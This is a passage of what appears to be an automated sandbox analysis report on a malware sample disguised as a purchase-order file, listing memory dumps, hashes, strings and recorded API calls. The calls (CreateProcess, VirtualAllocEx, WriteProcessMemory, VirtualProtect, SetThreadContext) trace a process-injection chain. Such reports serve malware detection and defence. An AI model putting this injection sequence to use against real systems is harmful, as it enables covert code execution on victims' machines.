                                                          • API String ID:
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748463440.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748918837.0000000005D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D00000, based on PE: true
                                                          • Associated: 00000000.00000002.1748768765.0000000005D00000.00000004.08000000.00040000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5d00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748463440.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1730071720.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1730071720.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1730071720.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748032705.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59e0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748463440.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748032705.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59e0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Hbq$Hbq$Hbq
                                                          • API String ID: 0-2297679979

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4'^q$4'^q$4'^q
                                                          • API String ID: 0-1196845430

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (bq$(bq$Hbq
                                                          • API String ID: 0-2835675688
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747687806.0000000005970000.00000040.00000800.00020000.00000000.sdmp, Offset: 05970000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5970000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4'^q$4'^q
                                                          • API String ID: 0-2697143702
                                                          • Opcode ID: 452850fa219e0c86aae64dd9e412b12effced3e9147f2caeb3f196943735a38d
                                                          • Instruction ID: af29c34c71592983b8af74200d02fe84e19a79e822cc3a09a25bf9073099a20e
                                                          • Opcode Fuzzy Hash: 452850fa219e0c86aae64dd9e412b12effced3e9147f2caeb3f196943735a38d
                                                          • Instruction Fuzzy Hash: 77520974E0420DCFCB15DFA8C499AAEBBB6FF49300F548556E512AB390CB386981DF91

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747687806.0000000005970000.00000040.00000800.00020000.00000000.sdmp, Offset: 05970000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5970000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4'^q$4'^q
                                                          • API String ID: 0-2697143702
                                                          • Opcode ID: bb28e587439b7eab646b1701e1e3168e2d0434d83c68aa7f06ab159f8ca0bd6d
                                                          • Instruction ID: d8cf30dbb8f551a9f38696f02bf86cb2601edcaa6b11895dc5650d2e3decf651
                                                          • Opcode Fuzzy Hash: bb28e587439b7eab646b1701e1e3168e2d0434d83c68aa7f06ab159f8ca0bd6d
                                                          • Instruction Fuzzy Hash: B222C434E1521CCFCF14DFA4C5586ACBBB6FF89301F6084AAD40AAB295DB386A45CF51

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747687806.0000000005970000.00000040.00000800.00020000.00000000.sdmp, Offset: 05970000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5970000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4'^q$4'^q
                                                          • API String ID: 0-2697143702
                                                          • Opcode ID: e792cdabe10b5e91eea034f69a4e9a89045ef14f7c2eb966aa51f2c58c89bf1c
                                                          • Instruction ID: 42b4ec1dcc3516dd5464ac6ab3e7571238a404d6356b395bf36fbeaa78cb9742
                                                          • Opcode Fuzzy Hash: e792cdabe10b5e91eea034f69a4e9a89045ef14f7c2eb966aa51f2c58c89bf1c
                                                          • Instruction Fuzzy Hash: 13F1C334E1121CDFCB18DFA4E4996ADBBB6FF89311F60846AE416A7390DB346985DF00

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748032705.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59e0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (bq$d
                                                          • API String ID: 0-3334038649
                                                          • Opcode ID: 3618e32b05224a54931b829b14c144c02748c2c352c7d39add4d3ea9413ab1e9
                                                          • Instruction ID: 72b274db3991bf93b35989b82ab1750a41b4094fc24287a9626d7711ce3ee0a7
                                                          • Opcode Fuzzy Hash: 3618e32b05224a54931b829b14c144c02748c2c352c7d39add4d3ea9413ab1e9
                                                          • Instruction Fuzzy Hash: 51D15A35600606CFCB15DF68C48496AB7FBFF88310B59C969E45A9B3A1DB31F842CB91

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (bq$Hbq
                                                          • API String ID: 0-4081012451
                                                          • Opcode ID: cbb0c7ec37f7aa714852f966b3ed1993f08f4f473ed1b52a185500046d88d4d3
                                                          • Instruction ID: 58f815fe1a4f307d99e38dd0836cb13112f50aa2d551ded3ccd820db2876fc28
                                                          • Opcode Fuzzy Hash: cbb0c7ec37f7aa714852f966b3ed1993f08f4f473ed1b52a185500046d88d4d3
                                                          • Instruction Fuzzy Hash: C25158317002148FDB69AF78C454A6E7BB6FFC5311B5084ACE9069B3A1DE35ED06CB91

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (bq$Hbq
                                                          • API String ID: 0-4081012451
                                                          • Opcode ID: 027823c9f95b4f8b6550bef6edb42bd657accd3e58dde05badec0e74b10be770
                                                          • Instruction ID: 4902aeedea3d37a7ad67f70107cdd89c60823a0e2f7042031444b3c2a06c51ab
                                                          • Opcode Fuzzy Hash: 027823c9f95b4f8b6550bef6edb42bd657accd3e58dde05badec0e74b10be770
                                                          • Instruction Fuzzy Hash: 5841E3367041118FD718DB68C954A6E7BF6EFC5711F2580AAE105CB3A2DE34EC02CB96

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ,bq
                                                          • API String ID: 0-2474004448
                                                          • Opcode ID: 6d81f2aadbdf9dec765ba17d63728b411757be36913794b1392fabd31caed0da
                                                          • Instruction ID: c2106dad0069e04602427836b5f3b783deff3b720764ee8fd7f03c24fad4499c
                                                          • Opcode Fuzzy Hash: 6d81f2aadbdf9dec765ba17d63728b411757be36913794b1392fabd31caed0da
                                                          • Instruction Fuzzy Hash: 42521A75A002288FDB64CF69C985BEDBBF6BF88300F1581D9E549A7351DA309E81CF61
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $^q
                                                          • API String ID: 0-388095546
                                                          • Opcode ID: 5e9ac103bd1228f4441274c0bc54cf4380def8bdcfe01f6ec5fb873c89a08ee7
                                                          • Instruction ID: 1636ec4698dd54891cd75385308932e83a4d8324fea78f131e91936e61350d1e
                                                          • Opcode Fuzzy Hash: 5e9ac103bd1228f4441274c0bc54cf4380def8bdcfe01f6ec5fb873c89a08ee7
                                                          • Instruction Fuzzy Hash: 21422935A00219DFCB15DF68C884E99BBB2FF89300F1585E9E549AB261DB31ED85CF81
                                                          APIs
                                                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 05B4572F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748463440.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID: CreateProcess
                                                          • String ID:
                                                          • API String ID: 963392458-0
                                                          • Opcode ID: 198ccd35ffdba58eb5972adbc9f0c037b0a4ac34b91def082dda207028d4f6af
                                                          • Instruction ID: 8d40c812d01bf829c75ab1b94e3969d0b7f0c377ea7d02946f94b433d7f65e52
                                                          • Opcode Fuzzy Hash: 198ccd35ffdba58eb5972adbc9f0c037b0a4ac34b91def082dda207028d4f6af
                                                          • Instruction Fuzzy Hash: 8DA103B5D00618DFDF20CFA9C8857EEBBB1FB09314F1091A9E858A7280DB749985DF45
                                                          APIs
                                                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 05B4572F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748463440.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID: CreateProcess
                                                          • String ID:
                                                          • API String ID: 963392458-0
                                                          • Opcode ID: 1b1803214e6874717e534e7102bab470971f9207e0486dbf0916c25d0fab1594
                                                          • Instruction ID: 8872c1fe3d5ef45860e538f4cc3fb50699ef696ec8bebb7fd33ac195ebabaf6a
                                                          • Opcode Fuzzy Hash: 1b1803214e6874717e534e7102bab470971f9207e0486dbf0916c25d0fab1594
                                                          • Instruction Fuzzy Hash: ABA103B0D00618DFDF20CFA9C885BEEBBB1FB49314F1091A9E858A7280DB749985DF45
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $^q
                                                          • API String ID: 0-388095546
                                                          • Opcode ID: fa2024f32ecf4ac81f482f0fd5c39d8c737662f75c16e7c541afe030e171cd99
                                                          • Instruction ID: 89a69ca4ddc7ce5224122a48eb826d75e65a5cca570f821088670c9b991c4e96
                                                          • Opcode Fuzzy Hash: fa2024f32ecf4ac81f482f0fd5c39d8c737662f75c16e7c541afe030e171cd99
                                                          • Instruction Fuzzy Hash: A4E1AD757042428FDB19DF38C45567E7EE2BF84200F1885ADE686CB3D2DA34C981EB56
                                                          APIs
                                                          • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 05B46013
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748463440.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID: MemoryProcessWrite
                                                          • String ID:
                                                          • API String ID: 3559483778-0
                                                          • Opcode ID: e59a1cee46037bed8d32b7ec6f0edff1e2bcdc45c041a98ac53049fb73294db7
                                                          • Instruction ID: e4b0909f3d1dd4104739c5c9bded466ff2e53de6b680f1cc5b0f2beba70dca0d
                                                          • Opcode Fuzzy Hash: e59a1cee46037bed8d32b7ec6f0edff1e2bcdc45c041a98ac53049fb73294db7
                                                          • Instruction Fuzzy Hash: A641FDB5D052488FCF10CFA9D980AEEBBF1BB49310F24946AE418BB250C779A945DF54
                                                          APIs
                                                          • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 05B46013
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748463440.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID: MemoryProcessWrite
                                                          • String ID:
                                                          • API String ID: 3559483778-0
                                                          • Opcode ID: e1c8381f7c9ca7aeb822fcd7d0fc570d3d15fbfbba8831738b9fc54d13fb5c62
                                                          • Instruction ID: 8ccd62e7d05b2d90dfd21e551abbd78c228277917a4ed8690a2e03376d83c038
                                                          • Opcode Fuzzy Hash: e1c8381f7c9ca7aeb822fcd7d0fc570d3d15fbfbba8831738b9fc54d13fb5c62
                                                          • Instruction Fuzzy Hash: 1641A9B5D012188FCF10CFA9D980AEEFBF1BB49310F24942AE418B7240C339AA45DF64
                                                          APIs
                                                          • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 05B46013
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748463440.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID: MemoryProcessWrite
                                                          • String ID:
                                                          • API String ID: 3559483778-0
                                                          APIs
                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05B45E8A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748463440.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID:
                                                          • API String ID: 4275171209-0
                                                          APIs
                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05B45E8A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748463440.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID:
                                                          • API String ID: 4275171209-0
                                                          APIs
                                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 05B468DC
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748463440.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID:
                                                          • API String ID: 544645111-0
                                                          APIs
                                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 05B468DC
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748463440.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID:
                                                          • API String ID: 544645111-0
                                                          APIs
                                                          • Wow64SetThreadContext.KERNEL32(?,?), ref: 05B4592F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748463440.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID: ContextThreadWow64
                                                          • String ID:
                                                          • API String ID: 983334009-0
                                                          APIs
                                                          • VirtualProtect.KERNEL32(?,?,?,?), ref: 05BBD82C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748642778.0000000005BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BB0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5bb0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID:
                                                          • API String ID: 544645111-0
                                                          APIs
                                                          • Wow64SetThreadContext.KERNEL32(?,?), ref: 05B4592F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748463440.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID: ContextThreadWow64
                                                          • String ID:
                                                          • API String ID: 983334009-0
                                                          APIs
                                                          • VirtualAlloc.KERNEL32(?,?,?,?), ref: 05BBE9EF
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748642778.0000000005BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BB0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5bb0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID:
                                                          • API String ID: 4275171209-0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ,bq
                                                          • API String ID: 0-2474004448
                                                          • Opcode ID: 7459e52b0f6cb13db1b8d5801df41ce80f0b3bd9b5773a318a264ed9b8aa9876
                                                          • Instruction ID: 8dd3130ac213cf80f7cf98053588e8a8ed621c86c62404d6ded39b7f7e27dc4f
                                                          • Opcode Fuzzy Hash: 7459e52b0f6cb13db1b8d5801df41ce80f0b3bd9b5773a318a264ed9b8aa9876
                                                          • Instruction Fuzzy Hash: 2111B235700105CFCB04DF69C854A6EBBB6EF89311F2580A5EA05DB3A1DB30EC01CB90
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748032705.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59e0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: L
                                                          • API String ID: 0-2909332022
                                                          • Opcode ID: e03308141a27445c3eb137b6dea372bc4085cb9969905150c48fc2ba5e08b4d7
                                                          • Instruction ID: ffd8cdcf142f987d4aca2896ce1569b9c3fb5d50d6235e9580cd53332fe5425a
                                                          • Opcode Fuzzy Hash: e03308141a27445c3eb137b6dea372bc4085cb9969905150c48fc2ba5e08b4d7
                                                          • Instruction Fuzzy Hash: C8F0AF70901228CFEB61CF54C888B9CBBB1BB08304F5094D6D48AA3240DB744EC0DF61
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: #
                                                          • API String ID: 0-1885708031
                                                          • Opcode ID: 8f063539a80cde51ffc373b7852d123eb583fefbb94f5e000d05d3bcd73f41fe
                                                          • Instruction ID: 8f42b765c7f2b02765e0a7e98542bf77b04dafbd3e2380cdc27353d2868cb251
                                                          • Opcode Fuzzy Hash: 8f063539a80cde51ffc373b7852d123eb583fefbb94f5e000d05d3bcd73f41fe
                                                          • Instruction Fuzzy Hash: 17F0B770904669CFDF24EF14DC4879AB7B1FB44356F1015D9E80AA3240D7786E85CF56
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Te^q
                                                          • API String ID: 0-671973202
                                                          • Opcode ID: 6420779934a9264dc1b8a50f86300aaca13f291a39b578da5acc37414db26ad5
                                                          • Instruction ID: 49c7ccc5d4c7a6bf9777da4835b1f74200db65f7697584fe69c8b7209894688f
                                                          • Opcode Fuzzy Hash: 6420779934a9264dc1b8a50f86300aaca13f291a39b578da5acc37414db26ad5
                                                          • Instruction Fuzzy Hash: 98F0F874E102188BDB98DF28C895BDEBBB2EB88300F1080D99449A7355CB306E85CF52
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4dae4e9b4724f4388e571fef04a1840480beddfbd49cf561858e057cc2df1574
                                                          • Instruction ID: be8a0676b0739c413df32578a7f133d4940b770e3a768a1432ac3f4aeb68b3eb
                                                          • Opcode Fuzzy Hash: 4dae4e9b4724f4388e571fef04a1840480beddfbd49cf561858e057cc2df1574
                                                          • Instruction Fuzzy Hash: 4112D734A102198FCB14EF64C994BADBBB2BF89300F5185A8D54AAB365DF34ED85CF41
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d1da014defa109828c52e29435f062c01e51e5359c236102f8c6625df279e05f
                                                          • Instruction ID: 3254e9f8d259b0ad95eb70c3b90f122fba2075bb8bd129a32f3dd6a9be14f815
                                                          • Opcode Fuzzy Hash: d1da014defa109828c52e29435f062c01e51e5359c236102f8c6625df279e05f
                                                          • Instruction Fuzzy Hash: A0A1E734B102148FCB14DF64D894BA9BBB2BF89300F5485A8E54AAB3A5DF34ED85CF41
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 374c66dbeac88ccb640f62574c59d731ad1c86fc79d7b393fe6542e2e5bc465a
                                                          • Instruction ID: 59669a65b6c656467055b0b61dc18d0597c0dd169e3a182919400e3d2c930cd2
                                                          • Opcode Fuzzy Hash: 374c66dbeac88ccb640f62574c59d731ad1c86fc79d7b393fe6542e2e5bc465a
                                                          • Instruction Fuzzy Hash: 9061AF36A00118DFCF15DF64D844EA9BBB2FF89310F0580E9E509AB262CB31ED56CB91
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a1afaef814bf47be0aa0cabfcb339f7a7571122d169b9af57471f263b840242f
                                                          • Instruction ID: a8618ac58b2eb2ba77f39ec8a9ab62c82ba483be693f9120a8fbd003cfdef60d
                                                          • Opcode Fuzzy Hash: a1afaef814bf47be0aa0cabfcb339f7a7571122d169b9af57471f263b840242f
